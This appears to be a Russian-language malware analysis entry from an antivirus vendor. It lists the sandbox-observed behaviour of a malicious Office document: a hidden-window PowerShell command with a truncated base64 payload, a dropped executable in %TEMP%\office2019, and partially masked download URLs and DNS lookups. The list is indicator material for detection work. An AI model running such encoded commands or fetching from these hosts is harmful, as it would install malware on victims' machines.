Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHIAcgAyADIAMwBrAD0AKAAnAEIAJwArACcANAAwADgAbAAnACsAJwBuADkAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBwAFwAbwBGAGYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3820
- %TEMP%\office2019\pz6kc0.exe
- 'br###tmega.com':443
- 'x1.#.lencr.org':80
- 'ca###l.adv.br':80
- 'du###low.com':80
- 'du###low.com':443
- 'fl###ergast.dk':80
- http://x1.#.lencr.org/
- http://ca###l.adv.br/css/wsF/
- http://www.du###low.com/wp-content/yvu1atyip7814/
- http://fl###ergast.dk/blogs/jdu6dq57246773/
- 'br###tmega.com':443
- 'du###low.com':443
- DNS ASK ca####shuasca.com
- DNS ASK se####eforlongi.com
- DNS ASK br###tmega.com
- DNS ASK x1.#.lencr.org
- DNS ASK ca###l.adv.br
- DNS ASK du###low.com
- DNS ASK em##shop.sk
- DNS ASK fl###ergast.dk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHIAcgAyADIAMwBrAD0AKAAnAEIAJwArACcANAAwADgAbAAnACsAJwBuADkAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBwAFwAbwBGAGYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG... (со скрытым окном)